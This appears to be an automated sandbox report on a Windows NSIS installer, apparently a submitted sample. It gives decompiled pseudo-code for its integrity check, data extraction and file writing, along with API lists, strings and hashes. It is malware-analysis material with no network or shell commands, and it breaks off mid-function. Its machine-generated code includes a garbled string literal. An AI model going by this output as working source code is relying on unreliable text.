                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E00402F0C(void* __eflags, signed int _a4) {
                                                            				DWORD* _v8;
                                                            				DWORD* _v12;
                                                            				void* _v16;
                                                            				intOrPtr _v20;
                                                            				long _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				signed int _v44;
                                                            				long _t50;
                                                            				void* _t57;
                                                            				intOrPtr* _t59;
                                                            				long _t60;
                                                            				long _t70;
                                                            				signed int _t77;
                                                            				intOrPtr _t80;
                                                            				long _t82;
                                                            				void* _t85;
                                                            				signed int _t87;
                                                            				void* _t89;
                                                            				long _t90;
                                                            				long _t93;
                                                            				intOrPtr* _t94;
                                                            
                                                            				_t82 = 0;
                                                            				_v12 = 0;
                                                            				_v8 = 0;
                                                            				 *0x45242c = GetTickCount() + 0x3e8;
                                                            				GetModuleFileNameA(0, 0x489000, 0x2000);
                                                            				_t89 = E00405DEA(0x489000, 0x80000000, 3);
                                                            				_v16 = _t89;
                                                            				 *0x40a018 = _t89;
                                                            				if(_t89 == 0xffffffff) {
                                                            					return "Error launching installer";
                                                            				}
                                                            				E00406257(0x481000, 0x489000);
                                                            				E00406257(0x48b000, E00405C30(0x481000));
                                                            				_t50 = GetFileSize(_t89, 0);
                                                            				 *0x43204c = _t50;
                                                            				_t93 = _t50;
                                                            				if(_t50 <= 0) {
                                                            					L24:
                                                            					E00402EA8(1);
                                                            					if( *0x452434 == _t82) {
                                                            						goto L29;
                                                            					}
                                                            					if(_v8 == _t82) {
                                                            						L28:
                                                            						_t94 = GlobalAlloc(0x40, _v24);
                                                            						E0040336B( *0x452434 + 0x1c);
                                                            						_push(_v24);
                                                            						_push(_t94);
                                                            						_push(_t82);
                                                            						_push(0xffffffff); // executed
                                                            						_t57 = E00403143(); // executed
                                                            						if(_t57 == _v24) {
                                                            							 *0x452430 = _t94;
                                                            							 *0x452438 =  *_t94;
                                                            							if((_v44 & 0x00000001) != 0) {
                                                            								 *0x45243c =  *0x45243c + 1;
                                                            							}
                                                            							_t40 = _t94 + 0x44; // 0x44
                                                            							_t59 = _t40;
                                                            							_t85 = 8;
                                                            							do {
                                                            								_t59 = _t59 - 8;
                                                            								 *_t59 =  *_t59 + _t94;
                                                            								_t85 = _t85 - 1;
                                                            							} while (_t85 != 0);
                                                            							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                            							 *(_t94 + 0x3c) = _t60;
                                                            							E00405DA5(0x452440, _t94 + 4, 0x40);
                                                            							return 0;
                                                            						}
                                                            						goto L29;
                                                            					}
                                                            					E0040336B( *0x426040);
                                                            					if(E00403355( &_a4, 4) == 0 || _v12 != _a4) {
                                                            						goto L29;
                                                            					} else {
                                                            						goto L28;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t90 = _t93;
                                                            						asm("sbb eax, eax");
                                                            						_t70 = ( ~( *0x452434) & 0x00007e00) + 0x200;
                                                            						if(_t93 >= _t70) {
                                                            							_t90 = _t70;
                                                            						}
                                                            						if(E00403355(0x41e040, _t90) == 0) {
                                                            							E00402EA8(1);
                                                            							L29:
                                                            							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                            						}
                                                            						if( *0x452434 != 0) {
                                                            							if((_a4 & 0x00000002) == 0) {
                                                            								E00402EA8(0);
                                                            							}
                                                            							goto L20;
                                                            						}
                                                            						E00405DA5( &_v44, 0x41e040, 0x1c);
                                                            						_t77 = _v44;
                                                            						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                            							_a4 = _a4 | _t77;
                                                            							_t87 =  *0x426040; // 0xa399b
                                                            							 *0x4524c0 =  *0x4524c0 | _a4 & 0x00000002;
                                                            							_t80 = _v20;
                                                            							 *0x452434 = _t87;
                                                            							if(_t80 > _t93) {
                                                            								goto L29;
                                                            							}
                                                            							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                            								_v8 = _v8 + 1;
                                                            								_t24 = _t80 - 4; // 0x5
                                                            								_t93 = _t24;
                                                            								if(_t90 > _t93) {
                                                            									_t90 = _t93;
                                                            								}
                                                            								goto L20;
                                                            							} else {
                                                            								break;
                                                            							}
                                                            						}
                                                            						L20:
                                                            						if(_t93 <  *0x43204c) {
                                                            							_v12 = E0040671A(_v12, 0x41e040, _t90);
                                                            						}
                                                            						 *0x426040 =  *0x426040 + _t90;
                                                            						_t93 = _t93 - _t90;
                                                            					} while (_t93 != 0);
                                                            					_t82 = 0;
                                                            					goto L24;
                                                            				}
                                                            			}



























                                                            0x00403059
                                                            0x00000000
                                                            0x00403050
                                                            0x00402fd9
                                                            0x00402fde
                                                            0x00402fe6
                                                            0x0040300c
                                                            0x00403012
                                                            0x0040301b
                                                            0x00403021
                                                            0x00403026
                                                            0x0040302c
                                                            0x00000000
                                                            0x00000000
                                                            0x00403036
                                                            0x0040303e
                                                            0x00403041
                                                            0x00403041
                                                            0x00403046
                                                            0x00403048
                                                            0x00403048
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403036
                                                            0x0040305a
                                                            0x00403060
                                                            0x0040306c
                                                            0x0040306c
                                                            0x0040306f
                                                            0x00403075
                                                            0x00403075
                                                            0x0040307d
                                                            0x00000000
                                                            0x0040307d

                                                            APIs
                                                            • GetTickCount.KERNEL32(75572754,00485000,0047B000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F1D
                                                            • GetModuleFileNameA.KERNEL32(00000000,00489000,00002000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F39
                                                              • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                              • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            • GetFileSize.KERNEL32(00000000,00000000,0048B000,00000000,00481000,00481000,00489000,00489000,80000000,00000003,?,?,004036FD,?,?,00000007), ref: 00402F85
                                                            • GlobalAlloc.KERNEL32(00000040,00000007,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 004030BB
                                                            Strings
                                                            • Null, xrefs: 00403003
                                                            • @A, xrefs: 00402F9A
                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004030E2
                                                            • Error launching installer, xrefs: 00402F5C
                                                            • soft, xrefs: 00402FFA
                                                            • Inst, xrefs: 00402FF1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                            • String ID: @A$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                            • API String ID: 2803837635-2937945327
                                                            • Opcode ID: ef4c9a5dc92e0d7598bd923cfc77fc61e239af6537ea3ff3a5b4cfa1ca02d18f
                                                            • Instruction ID: 4581bf354a42e99e0fb2dd836479f673db23d0c593d329681b7c8fb4cfaa4e30
                                                            • Opcode Fuzzy Hash: ef4c9a5dc92e0d7598bd923cfc77fc61e239af6537ea3ff3a5b4cfa1ca02d18f
                                                            • Instruction Fuzzy Hash: E751B431901204ABDB20AF65DD85B9F7EACEB15356F20813BF501B62D2C7BC8E418B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 727 403143-403157 728 403160-403169 727->728 729 403159 727->729 730 403172-403177 728->730 731 40316b 728->731 729->728 732 403187-403194 call 403355 730->732 733 403179-403182 call 40336b 730->733 731->730 737 403343 732->737 738 40319a-40319e 732->738 733->732 739 403345-403346 737->739 740 4031a4-4031ed GetTickCount 738->740 741 4032ee-4032f0 738->741 744 40334e-403352 739->744 745 4031f3-4031fb 740->745 746 40334b 740->746 742 403330-403333 741->742 743 4032f2-4032f5 741->743 747 403335 742->747 748 403338-403341 call 403355 742->748 743->746 749 4032f7 743->749 750 403200-40320e call 403355 745->750 751 4031fd 745->751 746->744 747->748 748->737 759 403348 748->759 753 4032fa-403300 749->753 750->737 761 403214-40321d 750->761 751->750 756 403302 753->756 757 403304-403312 call 403355 753->757 756->757 757->737 764 403314-403320 call 405e91 757->764 759->746 763 403223-403243 call 406788 761->763 769 4032e6-4032e8 763->769 770 403249-40325c GetTickCount 763->770 773 403322-40332c 764->773 774 4032ea-4032ec 764->774 769->739 771 4032a1-4032a3 770->771 772 40325e-403266 770->772 777 4032a5-4032a9 771->777 778 4032da-4032de 771->778 775 403268-40326c 772->775 776 40326e-403299 MulDiv wsprintfA call 405378 772->776 773->753 779 40332e 773->779 774->739 775->771 775->776 784 40329e 776->784 781 4032c0-4032cb 777->781 782 4032ab-4032b2 call 405e91 777->782 778->745 783 4032e4 778->783 779->746 786 4032ce-4032d2 781->786 787 4032b7-4032b9 782->787 783->746 784->771 786->763 788 4032d8 786->788 787->774 789 4032bb-4032be 787->789 788->746 789->786
                                                            C-Code - Quality: 95%
                                                            			E00403143(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                            				signed int _v8;
                                                            				int _v12;
                                                            				intOrPtr _v16;
                                                            				long _v20;
                                                            				intOrPtr _v24;
                                                            				char _v88;
                                                            				void* _t65;
                                                            				long _t70;
                                                            				intOrPtr _t75;
                                                            				long _t76;
                                                            				intOrPtr _t77;
                                                            				void* _t78;
                                                            				int _t88;
                                                            				intOrPtr _t92;
                                                            				intOrPtr _t95;
                                                            				long _t96;
                                                            				signed int _t97;
                                                            				int _t98;
                                                            				int _t99;
                                                            				intOrPtr _t100;
                                                            				void* _t101;
                                                            				void* _t102;
                                                            
                                                            				_t97 = _a16;
                                                            				_t92 = _a12;
                                                            				_v12 = _t97;
                                                            				if(_t92 == 0) {
                                                            					_v12 = 0x8000;
                                                            				}
                                                            				_v8 = _v8 & 0x00000000;
                                                            				_v16 = _t92;
                                                            				if(_t92 == 0) {
                                                            					_v16 = 0x42a048;
                                                            				}
                                                            				_t62 = _a4;
                                                            				if(_a4 >= 0) {
                                                            					E0040336B( *0x452478 + _t62);
                                                            				}
                                                            				if(E00403355( &_a16, 4) == 0) {
                                                            					L41:
                                                            					_push(0xfffffffd);
                                                            					goto L42;
                                                            				} else {
                                                            					if((_a19 & 0x00000080) == 0) {
                                                            						if(_t92 != 0) {
                                                            							if(_a16 < _t97) {
                                                            								_t97 = _a16;
                                                            							}
                                                            							if(E00403355(_t92, _t97) != 0) {
                                                            								_v8 = _t97;
                                                            								L44:
                                                            								return _v8;
                                                            							} else {
                                                            								goto L41;
                                                            							}
                                                            						}
                                                            						if(_a16 <= _t92) {
                                                            							goto L44;
                                                            						}
                                                            						_t88 = _v12;
                                                            						while(1) {
                                                            							_t98 = _a16;
                                                            							if(_a16 >= _t88) {
                                                            								_t98 = _t88;
                                                            							}
                                                            							if(E00403355(0x426048, _t98) == 0) {
                                                            								goto L41;
                                                            							}
                                                            							if(E00405E91(_a8, 0x426048, _t98) == 0) {
                                                            								L28:
                                                            								_push(0xfffffffe);
                                                            								L42:
                                                            								_pop(_t65);
                                                            								return _t65;
                                                            							}
                                                            							_v8 = _v8 + _t98;
                                                            							_a16 = _a16 - _t98;
                                                            							if(_a16 > 0) {
                                                            								continue;
                                                            							}
                                                            							goto L44;
                                                            						}
                                                            						goto L41;
                                                            					}
                                                            					_t70 = GetTickCount();
                                                            					 *0x4149ac =  *0x4149ac & 0x00000000;
                                                            					 *0x4149a8 =  *0x4149a8 & 0x00000000;
                                                            					_t14 =  &_a16;
                                                            					 *_t14 = _a16 & 0x7fffffff;
                                                            					_v20 = _t70;
                                                            					 *0x414490 = 8;
                                                            					 *0x41e038 = 0x416030;
                                                            					 *0x41e034 = 0x416030;
                                                            					 *0x41e030 = 0x41e030;
                                                            					_a4 = _a16;
                                                            					if( *_t14 <= 0) {
                                                            						goto L44;
                                                            					} else {
                                                            						goto L9;
                                                            					}
                                                            					while(1) {
                                                            						L9:
                                                            						_t99 = 0x4000;
                                                            						if(_a16 < 0x4000) {
                                                            							_t99 = _a16;
                                                            						}
                                                            						if(E00403355(0x426048, _t99) == 0) {
                                                            							goto L41;
                                                            						}
                                                            						_a16 = _a16 - _t99;
                                                            						 *0x414480 = 0x426048;
                                                            						 *0x414484 = _t99;
                                                            						while(1) {
                                                            							_t95 = _v16;
                                                            							 *0x414488 = _t95;
                                                            							 *0x41448c = _v12;
                                                            							_t75 = E00406788("\xef\xbf\							_v24 = _t75;
                                                            							if(_t75 < 0) {
                                                            								break;
                                                            							}
                                                            							_t100 =  *0x414488; // 0x42ce48
                                                            							_t101 = _t100 - _t95;
                                                            							_t76 = GetTickCount();
                                                            							_t96 = _t76;
                                                            							if(( *0x4524d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                            								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                            								_t102 = _t102 + 0xc;
                                                            								E00405378(0,  &_v88); // executed
                                                            								_v20 = _t96;
                                                            							}
                                                            							if(_t101 == 0) {
                                                            								if(_a16 > 0) {
                                                            									goto L9;
                                                            								}
                                                            								goto L44;
                                                            							} else {
                                                            								if(_a12 != 0) {
                                                            									_t77 =  *0x414488; // 0x42ce48
                                                            									_v8 = _v8 + _t101;
                                                            									_v12 = _v12 - _t101;
                                                            									_v16 = _t77;
                                                            									L23:
                                                            									if(_v24 != 1) {
                                                            										continue;
                                                            									}
                                                            									goto L44;
                                                            								}
                                                            								_t78 = E00405E91(_a8, _v16, _t101); // executed
                                                            								if(_t78 == 0) {
                                                            									goto L28;
                                                            								}
                                                            								_v8 = _v8 + _t101;
                                                            								goto L23;
                                                            							}
                                                            						}
                                                            						_push(0xfffffffc);
                                                            						goto L42;
                                                            					}
                                                            					goto L41;
                                                            				}
                                                            			}

























                                                            0x004032c0
                                                            0x004032c5
                                                            0x004032c8
                                                            0x004032cb
                                                            0x004032ce
                                                            0x004032d2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004032d8
                                                            0x004032b2
                                                            0x004032b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004032bb
                                                            0x00000000
                                                            0x004032bb
                                                            0x004032a3
                                                            0x004032e6
                                                            0x00000000
                                                            0x004032e6
                                                            0x00000000
                                                            0x004031f3

                                                            APIs
                                                            • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 004031AA
                                                            • GetTickCount.KERNEL32({B,00426048,00004000), ref: 00403251
                                                            • MulDiv.KERNEL32 ref: 0040327A
                                                            • wsprintfA.USER32 ref: 0040328A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CountTick$wsprintf
                                                            • String ID: ... %d%%$0`A$H`B$H`B${B
                                                            • API String ID: 551687249-3260306330
                                                            • Opcode ID: 0c9fc1d85663aad53be424f08f543157a3ad91164e87d18aa7b079f2db5192f9
                                                            • Instruction ID: 5e435b9e5989c49516ab484f42c851a836a172a2bf0c70b81729303e7d6c5b04
                                                            • Opcode Fuzzy Hash: 0c9fc1d85663aad53be424f08f543157a3ad91164e87d18aa7b079f2db5192f9
                                                            • Instruction Fuzzy Hash: 59516A71801219AFDB10CFA5DA8479F7BA8AB45766F14817BEC01B72C0C7789A50CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 790 401759-40177c call 402c39 call 405c56 795 401786-401798 call 406257 call 405be9 lstrcatA 790->795 796 40177e-401784 call 406257 790->796 801 40179d-4017a3 call 406535 795->801 796->801 806 4017a8-4017ac 801->806 807 4017ae-4017b8 call 4065ce 806->807 808 4017df-4017e2 806->808 815 4017ca-4017dc 807->815 816 4017ba-4017c8 CompareFileTime 807->816 810 4017e4-4017e5 call 405dc5 808->810 811 4017ea-401806 call 405dea 808->811 810->811 818 401808-40180b 811->818 819 40187e-4018a7 call 405378 call 403143 811->819 815->808 816->815 820 401860-40186a call 405378 818->820 821 40180d-40184f call 406257 * 2 call 4062ea call 406257 call 40596d 818->821 833 4018a9-4018ad 819->833 834 4018af-4018bb SetFileTime 819->834 831 401873-401879 820->831 821->806 855 401855-401856 821->855 835 402ace 831->835 833->834 837 4018c1-4018cc CloseHandle 833->837 834->837 839 402ad0-402ad4 835->839 840 4018d2-4018d5 837->840 841 402ac5-402ac8 837->841 843 4018d7-4018e8 call 4062ea lstrcatA 840->843 844 4018ea-4018ed call 4062ea 840->844 841->835 848 4018f2-40238a 843->848 844->848 853 40238f-402394 848->853 854 40238a call 40596d 848->854 853->839 854->853 855->831 856 401858-401859 855->856 856->820
                                                            C-Code - Quality: 73%
                                                            			E00401759(FILETIME* __ebx, void* __eflags) {
                                                            				void* _t33;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            				FILETIME* _t49;
                                                            				FILETIME* _t62;
                                                            				void* _t64;
                                                            				signed int _t70;
                                                            				FILETIME* _t71;
                                                            				FILETIME* _t75;
                                                            				signed int _t77;
                                                            				void* _t80;
                                                            				CHAR* _t82;
                                                            				void* _t85;
                                                            
                                                            				_t75 = __ebx;
                                                            				_t82 = E00402C39(0x31);
                                                            				 *(_t85 - 8) = _t82;
                                                            				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                            				_t33 = E00405C56(_t82);
                                                            				_push(_t82);
                                                            				if(_t33 == 0) {
                                                            					lstrcatA(E00405BE9(E00406257(0x40a438, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes")), ??);
                                                            				} else {
                                                            					_push(0x40a438);
                                                            					E00406257();
                                                            				}
                                                            				E00406535(0x40a438);
                                                            				while(1) {
                                                            					__eflags =  *(_t85 + 8) - 3;
                                                            					if( *(_t85 + 8) >= 3) {
                                                            						_t64 = E004065CE(0x40a438);
                                                            						_t77 = 0;
                                                            						__eflags = _t64 - _t75;
                                                            						if(_t64 != _t75) {
                                                            							_t71 = _t64 + 0x14;
                                                            							__eflags = _t71;
                                                            							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                            						}
                                                            						asm("sbb eax, eax");
                                                            						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                            						__eflags = _t70;
                                                            						 *(_t85 + 8) = _t70;
                                                            					}
                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                            					if( *(_t85 + 8) == _t75) {
                                                            						E00405DC5(0x40a438);
                                                            					}
                                                            					__eflags =  *(_t85 + 8) - 1;
                                                            					_t41 = E00405DEA(0x40a438, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                            					__eflags = _t41 - 0xffffffff;
                                                            					 *(_t85 - 0xc) = _t41;
                                                            					if(_t41 != 0xffffffff) {
                                                            						break;
                                                            					}
                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                            					if( *(_t85 + 8) != _t75) {
                                                            						E00405378(0xffffffe2,  *(_t85 - 8));
                                                            						__eflags =  *(_t85 + 8) - 2;
                                                            						if(__eflags == 0) {
                                                            							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                            						}
                                                            						L31:
                                                            						 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t85 - 4));
                                                            						__eflags =  *0x4524a8;
                                                            						goto L32;
                                                            					} else {
                                                            						E00406257(0x40e438, 0x453000);
                                                            						E00406257(0x453000, 0x40a438);
                                                            						E004062EA(_t75, 0x40e438, 0x40a438, "C:\Users\Albus\AppData\Local\Temp\nsx1ED8.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                            						E00406257(0x453000, 0x40e438);
                                                            						_t62 = E0040596D("C:\Users\Albus\AppData\Local\Temp\nsx1ED8.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                            						__eflags = _t62;
                                                            						if(_t62 == 0) {
                                                            							continue;
                                                            						} else {
                                                            							__eflags = _t62 == 1;
                                                            							if(_t62 == 1) {
                                                            								 *0x4524a8 =  &( *0x4524a8->dwLowDateTime);
                                                            								L32:
                                                            								_t49 = 0;
                                                            								__eflags = 0;
                                                            							} else {
                                                            								_push(0x40a438);
                                                            								_push(0xfffffffa);
                                                            								E00405378();
                                                            								L29:
                                                            								_t49 = 0x7fffffff;
                                                            							}
                                                            						}
                                                            					}
                                                            					L33:
                                                            					return _t49;
                                                            				}
                                                            				E00405378(0xffffffea,  *(_t85 - 8)); // executed
                                                            				 *0x4524d4 =  *0x4524d4 + 1;
                                                            				_t43 = E00403143( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                                                            				 *0x4524d4 =  *0x4524d4 - 1;
                                                            				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                            				_t80 = _t43;
                                                            				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                            					L22:
                                                            					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                            				} else {
                                                            					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                            					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                            						goto L22;
                                                            					}
                                                            				}
                                                            				CloseHandle( *(_t85 - 0xc)); // executed
                                                            				__eflags = _t80 - _t75;
                                                            				if(_t80 >= _t75) {
                                                            					goto L31;
                                                            				} else {
                                                            					__eflags = _t80 - 0xfffffffe;
                                                            					if(_t80 != 0xfffffffe) {
                                                            						E004062EA(_t75, _t80, 0x40a438, 0x40a438, 0xffffffee);
                                                            					} else {
                                                            						E004062EA(_t75, _t80, 0x40a438, 0x40a438, 0xffffffe9);
                                                            						lstrcatA(0x40a438,  *(_t85 - 8));
                                                            					}
                                                            					_push(0x200010);
                                                            					_push(0x40a438);
                                                            					E0040596D();
                                                            					goto L29;
                                                            				}
                                                            				goto L33;
                                                            			}

















                                                            APIs
                                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,00000031), ref: 00401798
                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,00000031), ref: 004017C2
                                                              • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00002000,00403556,0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                              • Part of subcall function 00405378: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C), ref: 004053D4
                                                              • Part of subcall function 00405378: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll), ref: 004053E6
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 0040540C
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405426
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: 8@$C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Call
                                                            • API String ID: 1941528284-3186164364
                                                            • Opcode ID: 03874d555682c28494de98f198ea20d949bb4d609246e22306f580c173a267ef
                                                            • Instruction ID: 3e968e9bdc471329156ed959ca9c7b0cca39a402a35bfbb3b78bbd1fa7da6ddf
                                                            • Opcode Fuzzy Hash: 03874d555682c28494de98f198ea20d949bb4d609246e22306f580c173a267ef
                                                            • Instruction Fuzzy Hash: F341D471900215BBCB207BB5CD45DAF7679EF45369B20823FF422B20E2D77C8A518A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 926 405378-40538d 927 405443-405447 926->927 928 405393-4053a5 926->928 929 4053b0-4053bc lstrlenA 928->929 930 4053a7-4053ab call 4062ea 928->930 931 4053d9-4053dd 929->931 932 4053be-4053ce lstrlenA 929->932 930->929 935 4053ec-4053f0 931->935 936 4053df-4053e6 SetWindowTextA 931->936 932->927 934 4053d0-4053d4 lstrcatA 932->934 934->931 937 4053f2-405434 SendMessageA * 3 935->937 938 405436-405438 935->938 936->935 937->938 938->927 939 40543a-40543d 938->939 939->927
                                                            C-Code - Quality: 100%
                                                            			E00405378(CHAR* _a4, CHAR* _a8) {
                                                            				struct HWND__* _v8;
                                                            				signed int _v12;
                                                            				CHAR* _v32;
                                                            				long _v44;
                                                            				int _v48;
                                                            				void* _v52;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				CHAR* _t26;
                                                            				signed int _t27;
                                                            				CHAR* _t28;
                                                            				long _t29;
